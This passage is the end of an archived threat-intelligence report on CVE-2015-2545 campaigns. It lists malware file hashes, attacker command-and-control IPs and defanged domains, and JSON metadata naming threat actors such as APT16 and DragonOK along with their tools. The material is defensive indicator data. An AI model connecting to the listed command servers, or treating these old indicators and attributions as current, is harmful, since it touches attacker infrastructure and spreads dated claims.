dropper:\r\n6bbdbf6d3b24b8bfa296b9c76b95bb2f\r\nRarSFX:\r\nd0407e1a66ee2082a0d170814bd4ab02\r\n4902abe46039d36b45ac8a39c745445a\r\nPotplayer:\r\nf16903b2ff82689404f7d0820f461e5d (clean tool)\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 20 of 21\n\nTrojans:\r\n6bbdbf6d3b24b8bfa296b9c76b95bb2f (dropper, from cab-archive)\r\n3fbe576d33595734a92a665e72e5a04f (http.exe)\r\n8ad9cb6b948bcf7f9211887e0cf6f02a (lsass.exe)\r\n9469dd12136b6514d82c3b01d6082f59\r\nbe0cc8411c066eac246097045b73c282 (mshtml.dll)\r\nbae673964e9bc2a45ebcc667895104ef\r\nd44e971b202d573f8c797845c90e4658 (update.dat)\r\n332397ec261393aaa58522c4357c3e48 (potplayer.dll)\r\n2460871a040628c379e04f79af37060d (appinfo.dat)\r\nC2\r\n180.150.227.135\r\nGoback.strangled[.]net:443\r\ncarwiseplot.no-ip[.]org (115.144.69.54, 115.144.107.9)\r\nnewsupdate.dynssl[.]com (103.61.136.120)\r\ndnsnews.dns05[.]com (118.193.12.252)\r\nAppendix C: sample hashes of SVCMONDR attacks\r\nEmails:\r\n7a60da8198c4066cc52d79eecffcb327 (Taiwan, janet@eranger.com.tw)\r\nDoc (Web Archive File):\r\nd0533874d7255b881187e842e747c268 (Taiwan, 1-3說明檔.doc)\r\nEPS:\r\n98c57aa9c7e3f90c4eb4afeba8128484 (Taiwan)\r\nTrojans:\r\n8052234dcd41a7d619acb0ec9636be0b (svcmondr.ex, Taiwan)\r\n046b98a742cecc11fb18d9554483be2d (svcmondr.ex,Thailand)\r\nC2:\r\n59.188.13.204\r\n180.128.10.28\r\nwww.ocaler.mooo[.]com\r\nwww.onmypc.serverpit[.]com\r\nSource: https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nhttps://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/" ], "report_names": [ "cve-2015-2545-overview-of-current-threats" ], "threat_actors": [ { "id": "2608db3e-7f7a-42c0-922b-4c9cb22c7ce9", "created_at": "2023-01-06T13:46:38.278691Z", "updated_at": "2026-04-10T02:00:02.90849Z", "deleted_at": null, "main_name": "APT16", "aliases": [ "SVCMONDR", "G0023" ], "source_name": "MISPGALAXY:APT16", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "5ffe400c-6025-44c2-9aa1-7c34a7a192b0", "created_at": "2023-01-06T13:46:38.469688Z", "updated_at": "2026-04-10T02:00:02.987949Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Moafee", "BRONZE OVERBROOK", "G0017", "G0002", "Shallow Taurus" ], "source_name": "MISPGALAXY:DragonOK", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2d7530f9-cd8e-4703-8aed-ab938e3b08cf", "created_at": "2023-01-06T13:46:38.620662Z", "updated_at": "2026-04-10T02:00:03.04163Z", "deleted_at": null, "main_name": "Danti", "aliases": [], "source_name": "MISPGALAXY:Danti", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fda88fa-7c1f-4e84-b3c8-56f73f21aaf5", "created_at": "2022-10-25T16:07:24.147011Z", "updated_at": "2026-04-10T02:00:04.881289Z", "deleted_at": null, "main_name": "Samurai Panda", "aliases": [], "source_name": "ETDA:Samurai Panda", "tools": [ "Agent.dhwf", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Getkys", "IsSpace", "KABOB", "Kaba", "Korplug", "NfLog RAT", "PlugX", "Poldat", "RedDelta", "Sogu", "Sykipot", "TIGERPLUG", "TVT", "Thoper", "Wkysol", "Xamtrav", "Zlib", "ffrat" ], "source_id": "ETDA", "reports": null }, { "id": "fed3d66d-1721-43b0-b5e1-d35931dc6e71", "created_at": "2022-10-25T15:50:23.72724Z", "updated_at": "2026-04-10T02:00:05.411885Z", "deleted_at": null, "main_name": "APT16", "aliases": [ "APT16" ], "source_name": "MITRE:APT16", "tools": [ "ELMER" ], "source_id": "MITRE", "reports": null }, { "id": "7ebda3c6-1789-4d84-97cf-47fb18a0cb28", "created_at": "2022-10-25T15:50:23.78829Z", "updated_at": "2026-04-10T02:00:05.415039Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "DragonOK" ], "source_name": "MITRE:DragonOK", "tools": [ "PoisonIvy", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "9d6f666e-3a9d-4a09-bcac-8aee96572827", "created_at": "2022-10-25T15:50:23.2832Z", "updated_at": "2026-04-10T02:00:05.268714Z", "deleted_at": null, "main_name": "admin@338", "aliases": [ "admin@338" ], "source_name": "MITRE:admin@338", "tools": [ "BUBBLEWRAP", "LOWBALL", "Systeminfo", "PoisonIvy", "netstat", "ipconfig" ], "source_id": "MITRE", "reports": null }, { "id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4", "created_at": "2023-01-06T13:46:38.595679Z", "updated_at": "2026-04-10T02:00:03.033762Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "TwoForOne", "G0068", "ATK33" ], "source_name": "MISPGALAXY:PLATINUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1f29d13d-268d-4c26-ac4a-1ce8cebdbd3a", "created_at": "2023-01-06T13:46:38.351187Z", "updated_at": "2026-04-10T02:00:02.938577Z", "deleted_at": null, "main_name": "TEMPER PANDA", "aliases": [ "Admin338", "Team338", "admin@338", "G0018" ], "source_name": "MISPGALAXY:TEMPER PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a", "created_at": "2022-10-25T16:07:24.061767Z", "updated_at": "2026-04-10T02:00:04.854503Z", "deleted_at": null, "main_name": "Platinum", "aliases": [ "ATK 33", "G0068", "Operation EasternRoppels", "TwoForOne" ], "source_name": "ETDA:Platinum", "tools": [ "AMTsol", "Adupib", "Adupihan", "Dipsind", "DvDupdate.dll", "JPIN", "LOLBAS", "LOLBins", "Living off the Land", "RedPepper", "RedSalt", "Titanium", "adbupd", "psinstrc.ps1" ], "source_id": "ETDA", "reports": null }, { "id": "2ac8fb39-1ad4-407c-bf51-249751a575ba", "created_at": "2023-01-06T13:46:38.337728Z", "updated_at": "2026-04-10T02:00:02.933527Z", "deleted_at": null, "main_name": "SAMURAI PANDA", "aliases": [ "PLA Navy", "Wisp Team" ], "source_name": "MISPGALAXY:SAMURAI PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "c6604303-a1c8-4e59-ba12-5da5c0bc6877", "created_at": "2023-01-06T13:46:38.312359Z", "updated_at": "2026-04-10T02:00:02.923025Z", "deleted_at": null, "main_name": "APT14", "aliases": [ "ANCHOR PANDA", "QAZTeam" ], "source_name": "MISPGALAXY:APT14", "tools": [ "Backdoor.Win32.PoisonIvy", "Gen:Trojan.Heur.PT", "Torn RAT", "Anchor Panda", "Gh0st Rat", "Gh0stRat, GhostRat", "Poison Ivy" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "25a38dea-d23b-479b-9548-024e955b8964", "created_at": "2022-10-25T16:07:23.305911Z", "updated_at": "2026-04-10T02:00:04.533448Z", "deleted_at": null, "main_name": "Anchor Panda", "aliases": [ "APT 14", "Anchor Panda", "QAZTeam" ], "source_name": "ETDA:Anchor Panda", "tools": [ "AngryRebel", "Chymine", "Darkmoon", "Farfli", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Moudour", "Mydoor", "PCRat", "Poison Ivy", "SPIVY", "Torn RAT", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "6301aade-ca8b-431c-b5e4-1b6ddd497ffc", "created_at": "2022-10-25T16:07:23.328033Z", "updated_at": "2026-04-10T02:00:04.544144Z", "deleted_at": null, "main_name": "APT 16", "aliases": [ "APT 16", "G0023", "SVCMONDR" ], "source_name": "ETDA:APT 16", "tools": [ "ELMER", "Elmost", "IRONHALO", "SVCMONDR" ], "source_id": "ETDA", "reports": null }, { "id": "593dd07d-853c-46cd-8117-e24061034bbf", "created_at": "2025-08-07T02:03:24.648074Z", "updated_at": "2026-04-10T02:00:03.625859Z", "deleted_at": null, "main_name": "BRONZE OVERBROOK", "aliases": [ "Danti ", "DragonOK ", "Samurai Panda ", "Shallow Taurus ", "Temp.DragonOK " ], "source_name": "Secureworks:BRONZE OVERBROOK", "tools": [ "Aveo", "DDKONG", "Godzilla Webshell", "HelloBridge", "IsSpace", "NFLog Trojan", "PLAINTEE", "PlugX", "Rambo" ], "source_id": "Secureworks", "reports": null }, { "id": "c23ca3e9-6b58-4f24-b4eb-ce3b24815ac4", "created_at": "2022-10-25T16:07:24.313367Z", "updated_at": "2026-04-10T02:00:04.932247Z", "deleted_at": null, "main_name": "Temper Panda", "aliases": [ "G0018", "Team338", "Temper Panda", "admin@338" ], "source_name": "ETDA:Temper Panda", "tools": [ "BUBBLEWRAP", "Backdoor.APT.FakeWinHTTPHelper", "Bozok", "Bozok RAT", "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "LOLBAS", "LOLBins", "LOWBALL", "Living off the Land", "Poison Ivy", "SPIVY", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "03888cef-07bb-436a-8501-c063c02d0cc9", "created_at": "2023-01-06T13:46:38.655383Z", "updated_at": "2026-04-10T02:00:03.056907Z", "deleted_at": null, "main_name": "EvilPost", "aliases": [], "source_name": "MISPGALAXY:EvilPost", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "340d1673-0678-4e1f-8b75-30da2f65cc80", "created_at": "2022-10-25T16:07:23.552036Z", "updated_at": "2026-04-10T02:00:04.653109Z", "deleted_at": null, "main_name": "DragonOK", "aliases": [ "Bronze Overbrook", "G0017", "Shallow Taurus" ], "source_name": "ETDA:DragonOK", "tools": [ "Agent.dhwf", "CT", "Chymine", "Darkmoon", "Destroy RAT", "DestroyRAT", "FF-RAT", "FormerFirstRAT", "Gen:Trojan.Heur.PT", "HTran", "HUC Packet Transmit Tool", "HelloBridge", "IsSpace", "KHRAT", "Kaba", "Korplug", "Mongall", "NFlog", "NewCT", "NfLog RAT", "PlugX", "Poison Ivy", "Rambo", "RedDelta", "SPIVY", "Sogu", "SysGet", "TIGERPLUG", "TVT", "Thoper", "TidePool", "Xamtrav", "brebsd", "ffrat", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "33f527a5-a5da-496a-a48c-7807cc858c3e", "created_at": "2022-10-25T15:50:23.803657Z", "updated_at": "2026-04-10T02:00:05.333523Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "PLATINUM" ], "source_name": "MITRE:PLATINUM", "tools": [ "JPIN", "Dipsind", "adbupd" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434329, "ts_updated_at": 1775792134, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.pdf", "text": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.txt", "img": "https://archive.orkl.eu/5f5a871c3a384effc66df7cba9103f909f1901ab.jpg" } }